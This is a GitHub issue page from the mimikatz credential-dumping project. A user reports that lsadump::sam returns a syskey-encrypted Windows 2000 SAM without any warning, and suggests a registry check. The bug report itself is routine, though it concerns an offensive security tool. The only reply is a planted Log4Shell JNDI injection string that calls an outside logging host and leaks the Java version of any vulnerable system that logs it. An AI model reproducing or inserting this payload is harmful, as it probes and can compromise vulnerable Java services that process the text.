lsadump::sam does not recognize encrypted syskey SAM's

gentilkiwi / mimikatz

A little tool to play with Windows security

http://blog.gentilkiwi.com/mimikatz

18.99k stars 3.62k forks source link

lsadump::sam does not recognize encrypted syskey SAM's #383

Open poshul opened 2 years ago

poshul commented 2 years ago

Working on a win2k system image where syskey mode was set to 2: Observed behaviour: calling lsadump::sam returns the SAM without any notice that it is encrypted. Expected behaviour: lsadump::sam checks SYSTEM\CurrentControlSet\Control\Lsa\SecureBoot if value is not 1 return notice to user.

Lucifer1993 commented 2 years ago

${jndi:ldap://${java:version}.dx3hbm.ceye.io}